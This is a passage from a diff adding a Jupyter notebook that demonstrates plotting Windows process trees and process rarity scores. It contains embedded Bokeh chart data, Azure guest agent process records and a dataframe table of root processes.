c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\"],\"path\":[\"1007\",\"1007/103\",\"1007/103/104\",\"1007/103/105\",\"1007/103/105/106\",\"1007/123\",\"1007/123/124\",\"1007/134\",\"1007/134/135\",\"1007/134/136\",\"1007/134/136/137\",\"1007/343\",\"1007/343/344\",\"1007/343/349\",\"1007/343/349/350\",\"1007/364\",\"1007/364/365\",\"1007/364/366\",\"1007/364/366/367\",\"1007/385\",\"1007/385/386\",\"1007/385/387\",\"1007/385/387/388\",\"1007/502\",\"1007/502/503\",\"1007/502/504\",\"1007/502/504/505\",\"1007/520\",\"1007/520/521\",\"1007/520/526\",\"1007/520/526/527\",\"1007/530\",\"1007/530/531\",\"1007/594\",\"1007/594/595\",\"1007/594/620\",\"1007/594/620/621\",\"1007/640\",\"1007/640/641\",\"1007/640/642\",\"1007/640/642/643\",\"1007/655\",\"1007/655/656\",\"1007/655/657\",\"1007/655/657/658\",\"1007/69\",\"1007/69/70\",\"1007/69/74\",\"1007/69/74/75\",\"1007/756\",\"1007/756/757\",\"1007/756/758\",\"1007/756/758/759\",\"1007/771\",\"1007/771/772\",\"1007/771/773\",\"1007/771/773/774\",\"1007/788\",\"1007/788/789\",\"1007/791\",\"1007/791/792\",\"1007/791/793\",\"1007/791/793/794\",\"1007/889\",\"1007/889/890\",\"1007/889/895\",\"1007/889/895/896\",\"1007/910\",\"1007/910/911\",\"1007/910/912\",\"1007/910/912/913\",\"1007/926\",\"1007/926/927\",\"1007/926/928\",\"1007/926/928/929\"],\"proc_key\":[\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe|0x1994|1970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x20b0|2019-02-09 23:16:28.163000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xccc|2019-02-09 23:20:15.547000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x14ec|2019-02-09 23:20:15.560000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0xda8|2019-02-09 23:55:46.057000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1cfc|2019-02-09 23:55:46.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x7fc|2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x108c|2019-02-10 00:22:33.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x798|2019-02-10 00:26:22.213000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x22e0|2019-02-10 00:26:22.227000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x172c|2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1dec|2019-02-10 01:27:25.197000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xe2c|2019-02-10 01:31:14.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1080|2019-02-10 01:31:14.020000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xb14|2019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x17ec|2019-02-10 02:31:30.387000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1898|2019-02-10 02:35:21.217000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1058|2019-02-10 02:35:21.230000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xe1c|2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x834|2019-02-10 03:35:37.283000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17c4|2019-02-10 03:39:26.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x88c|2019-02-10 03:39:26.337000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x2e4|2019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x108c|2019-02-10 04:39:41.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1360|2019-02-10 04:43:32.697000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x19f4|2019-02-10 04:43:32.710000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x19f0|2019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1570|2019-02-10 05:43:48.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x17a8|2019-02-10 05:47:40.657000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1058|2019-02-10 05:47:40.667000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x82c|2019-02-10 05:55:52.110000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xd44|2019-02-10 05:55:52.123000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1bfc|2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1998|2019-02-10 06:47:56.830000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1c10|2019-02-10 06:51:50.063000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1184|2019-02-10 06:51:50.073000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xc6c|2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x454|2019-02-10 07:52:06.727000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 07:56:00.233000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xe1c|2019-02-10 07:56:00.247000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1070|2019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1ce8|2019-02-10 08:56:16.607000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xb10|2019-02-10 09:00:10.517000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x2260|2019-02-10 09:00:10.533000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1c54|2019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x181c|2019-02-09 22:11:59.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x8c0|2019-02-09 22:16:24.523000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1f60|2019-02-09 22:16:24.537000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x123c|2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x518|2019-02-10 10:00:27.057000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xc98|2019-02-10 10:04:18.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1cdc|2019-02-10 10:04:18.747000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x1484|2019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xb14|2019-02-10 11:04:35.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x16bc|2019-02-10 11:08:29.550000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1bb4|2019-02-10 11:08:29.573000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe|0x1be4|2019-02-10 11:55:57.567000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xec4|2019-02-10 11:55:57.577000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd68|2019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xb64|2019-02-10 12:08:46.183000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1eb4|2019-02-10 12:12:35.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xc98|2019-02-10 12:12:35.887000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x6f8|2019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x84c|2019-02-10 13:12:52.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1d6c|2019-02-10 13:16:43.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x490|2019-02-10 13:16:43.027000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0x16d4|2019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0xa2c|2019-02-10 14:16:59.437000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x65c|2019-02-10 14:20:50.820000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x12fc|2019-02-10 14:20:50.830000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe|0xd78|2019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x221c|2019-02-10 15:21:06.907000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1238|2019-02-10 15:24:56.040000\",\"c:\\\\windows\\\\system32\\\\conhost.exe|0x1584|2019-02-10 15:24:56.050000\"],\"source_index\":[\"1007\",\"103\",\"104\",\"105\",\"106\",\"123\",\"124\",\"134\",\"135\",\"136\",\"137\",\"343\",\"344\",\"349\",\"350\",\"364\",\"365\",\"366\",\"367\",\"385\",\"386\",\"387\",\"388\",\"502\",\"503\",\"504\",\"505\",\"520\",\"521\",\"526\",\"527\",\"530\",\"531\",\"594\",\"595\",\"620\",\"621\",\"640\",\"641\",\"642\",\"643\",\"655\",\"656\",\"657\",\"658\",\"69\",\"70\",\"74\",\"75\",\"756\",\"757\",\"758\",\"759\",\"771\",\"772\",\"773\",\"774\",\"788\",\"789\",\"791\",\"792\",\"793\",\"794\",\"889\",\"890\",\"895\",\"896\",\"910\",\"911\",\"912\",\"913\",\"926\",\"927\",\"928\",\"929\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAAAA0I5AAAAAAADQjkAAAAAAAOCOQAAAAAAAAPh/AAAAAADQiEAAAAAAAAD4fwAAAAAA4H9AAAAAAADgf0AAAAAAADiBQAAAAAAAAPh/AAAAAADIhUAAAAAAAMiFQAAAAAAAwIZAAAAAAAAA+H8AAAAAAAB9QAAAAAAAAH1AAAAAAAAwgEAAAAAAAAD4fwAAAAAAoINAAAAAAACgg0AAAAAAAEiFQAAAAAAAAPh/AAAAAABQd0AAAAAAAFB3QAAAAAAAUHhAAAAAAAAA+H8AAAAAAAB7QAAAAAAAAHtAAAAAAADgekAAAAAAAAD4fwAAAAAAsHdAAAAAAAAA+H8AAAAAACByQAAAAAAAIHJAAAAAAABwfEAAAAAAAAD4fwAAAAAAMHtAAAAAAAAwe0AAAAAAALB+QAAAAAAAAPh/AAAAAACgZ0AAAAAAAKBnQAAAAAAAgHpAAAAAAAAA+H8AAAAAAMiNQAAAAAAAyI1AAAAAAAAYikAAAAAAAAD4fwAAAAAA4HFAAAAAAADgcUAAAAAAAMBxQAAAAAAAAPh/AAAAAADgb0AAAAAAAOBvQAAAAAAA4GNAAAAAAAAA+H8AAAAAACBkQAAAAAAAAPh/AAAAAABAWkAAAAAAAEBaQAAAAAAAgGxAAAAAAAAA+H8AAAAAAMBZQAAAAAAAwFlAAAAAAADgZ0AAAAAAAAD4fwAAAAAAQFxAAAAAAABAXEAAAAAAAEBdQAAAAAAAAPh/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAF9A\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[75]},\"timestamp_orig_par\":[\"NaN\",0.0,1549754188153.0,1549754188153.0,1549754415547.0,0.0,1549756546057.0,0.0,1549758153813.0,1549758153813.0,1549758382213.0,0.0,1549762045173.0,1549762045173.0,1549762274009.9998,0.0,1549765890377.0,1549765890377.0,1549766121217.0,0.0,1549769737273.0,1549769737273.0,1549769966323.0,0.0,1549773581880.0,1549773581880.0,1549773812697.0,0.0,1549777428783.0,1549777428783.0,1549777660657.0,0.0,1549778152110.0002,0.0,1549781276813.0,1549781276813.0,1549781510063.0,0.0,1549785126713.0,1549785126713.0,1549785360233.0,0.0,1549788976593.0,1549788976593.0,1549789210517.0,0.0,1549750319877.0,1549750319877.0,1549750584523.0,0.0,1549792827043.0,1549792827043.0,1549793058733.0,0.0,1549796675127.0,1549796675127.0,1549796909550.0002,0.0,1549799757567.0,0.0,1549800526173.0,1549800526173.0,1549800755877.0,0.0,1549804372733.0,1549804372733.0,1549804603013.0,0.0,1549808219427.0,1549808219427.0,1549808450820.0,0.0,1549812066889.9998,1549812066889.9998,1549812296040.0]},\"selected\":{\"id\":\"2474\"},\"selection_policy\":{\"id\":\"2473\"}},\"id\":\"2427\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"field\":\"SubjectUserName\",\"transform\":{\"id\":\"2428\"}},\"hatch_alpha\":{\"value\":0.1},\"height\":{\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2459\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"2462\",\"type\":\"Rect\"},{\"attributes\":{\"text\":{\"field\":\"__proc_id$$\"},\"text_baseline\":{\"value\":\"middle\"},\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"2493\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"2494\"}}},\"id\":\"2496\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"2432\"},\"value\":0.1},\"id\":\"2477\",\"type\":\"Dodge\"},{\"attributes\":{\"axis_line_color\":null,\"coordinates\":null,\"formatter\":{\"id\":\"2468\"},\"group\":null,\"major_label_policy\":{\"id\":\"2469\"},\"major_label_standoff\":0,\"major_tick_line_color\":\"navy\",\"ticker\":{\"id\":\"2445\"},\"visible\":false},\"id\":\"2444\",\"type\":\"LinearAxis\"}],\"root_ids\":[\"2548\"]},\"title\":\"Bokeh Application\",\"version\":\"2.4.2\"}};\n  const render_items = [{\"docid\":\"e2972026-78d2-4b04-b72e-4ae28c52cb2c\",\"root_ids\":[\"2548\"],\"roots\":{\"2548\":\"211a8316-13cb-485c-9a7a-64b769a2e517\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    let attempts = 0;\n    const timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);",
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2548"
+      }
+     },
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/plain": [
+       "(Figure(id='2429', ...), Row(id='2548', ...))"
+      ]
+     },
+     "execution_count": 23,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "ptree.plot_process_tree(data=full_tree[:1000], legend_col=\"SubjectUserName\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Plotting Using a color gradient"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 7,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:41.192996Z",
+     "start_time": "2020-08-25T15:53:30.369997Z"
+    },
+    "execution_event_id": "2bb8c149-9ab9-4a74-8e3f-d9418c3c794f",
+    "last_executed_text": "p_tree_leg = ptree.build_process_tree(proc_tree, show_progress=True)",
+    "persistent_id": "1918edbe-6e6a-4d00-9c31-de7fed6f588b",
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "{'Processes': 22992, 'RootProcesses': 31, 'LeafProcesses': 15587, 'BranchProcesses': 7374, 'IsolatedProcesses': 0, 'LargestTreeDepth': 839}\n"
+     ]
+    }
+   ],
+   "source": [
+    "proc_rarity = pd.read_pickle(\"./data/procs_with_cluster.pkl\")\n",
+    "proc_rarity_tree = ptree.build_process_tree(proc_rarity, show_summary=True)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 8,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-08-25T15:53:46.774998Z",
+     "start_time": "2020-08-25T15:53:41.194998Z"
+    },
+    "execution_event_id": "0a375198-c37a-4e9b-a288-b6bfd8fec5d3",
+    "last_executed_text": "proc_rarity.head()",
+    "persistent_id": "e27a3066-b20e-483c-b9c2-52c154f1a03c",
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>Row</th>\n",
+       "      <th>RootProcess</th>\n",
+       "      <th>TreeSize:</th>\n",
+       "      <th>AverageRarity</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>27</th>\n",
+       "      <td>27</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>4</td>\n",
+       "      <td>0.666726</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>23</th>\n",
+       "      <td>23</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.500000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>22</th>\n",
+       "      <td>22</td>\n",
+       "      <td>C:\\Windows\\System32\\smss.exe</td>\n",
+       "      <td>30</td>\n",
+       "      <td>0.398288</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>20</th>\n",
+       "      <td>20</td>\n",
+       "      <td>C:\\Windows\\SoftwareDistribution\\Download\\Insta...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.333333</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>9</th>\n",
+       "      <td>9</td>\n",
+       "      <td>C:\\Windows\\System32\\smss.exe</td>\n",
+       "      <td>7</td>\n",
+       "      <td>0.250000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>7</th>\n",
+       "      <td>7</td>\n",
+       "      <td>C:\\ProgramData\\Microsoft\\Windows Defender\\plat...</td>\n",
+       "      <td>46</td>\n",
+       "      <td>0.190123</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>10</th>\n",
+       "      <td>10</td>\n",
+       "      <td>C:\\Windows\\System32\\winlogon.exe</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.166667</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>5</th>\n",
+       "      <td>5</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>21</td>\n",
+       "      <td>0.146667</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>18</th>\n",
+       "      <td>18</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>3</td>\n",
+       "      <td>0.125089</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>13</th>\n",
+       "      <td>13</td>\n",
+       "      <td>C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.3031...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.125000</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>29</th>\n",
+       "      <td>29</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>4</td>\n",
+       "      <td>0.095297</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>25</th>\n",
+       "      <td>25</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>4</td>\n",
+       "      <td>0.095297</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>21</th>\n",
+       "      <td>21</td>\n",
+       "      <td>C:\\ProgramData\\Microsoft\\Windows Defender\\plat...</td>\n",
+       "      <td>21</td>\n",
+       "      <td>0.059754</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>16</th>\n",
+       "      <td>16</td>\n",
+       "      <td>C:\\Windows\\System32\\services.exe</td>\n",
+       "      <td>320</td>\n",
+       "      <td>0.056118</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>15</th>\n",
+       "      <td>15</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>1381</td>\n",
+       "      <td>0.038497</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>2</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>2192</td>\n",
+       "      <td>0.025462</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>4</td>\n",
+       "      <td>C:\\Windows\\System32\\services.exe</td>\n",
+       "      <td>105</td>\n",
+       "      <td>0.025112</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>3</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>689</td>\n",
+       "      <td>0.019825</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>0</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>13</td>\n",
+       "      <td>0.012703</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>11</th>\n",
+       "      <td>11</td>\n",
+       "      <td>unknown</td>\n",
+       "      <td>8936</td>\n",
+       "      <td>0.011424</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>1</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>259</td>\n",
+       "      <td>0.007365</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>19</th>\n",
+       "      <td>19</td>\n",
+       "      <td>C:\\Windows\\System32\\svchost.exe</td>\n",
+       "      <td>4949</td>\n",
+       "      <td>0.007174</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>17</th>\n",
+       "      <td>17</td>\n",
+       "      <td>C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-...</td>\n",
+       "      <td>11</td>\n",
+       "      <td>0.007138</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>14</th>\n",
+       "      <td>14</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>274</td>\n",
+       "      <td>0.003676</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>8</th>\n",
+       "      <td>8</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>3703</td>\n",
+       "      <td>0.000194</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>12</th>\n",
+       "      <td>12</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>24</th>\n",
+       "      <td>24</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>26</th>\n",
+       "      <td>26</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
+       "      <td>2</td>\n",
+       "      <td>0.000178</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>28</th>\n",
+       "      <td>28</td>\n",
+       "      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n",
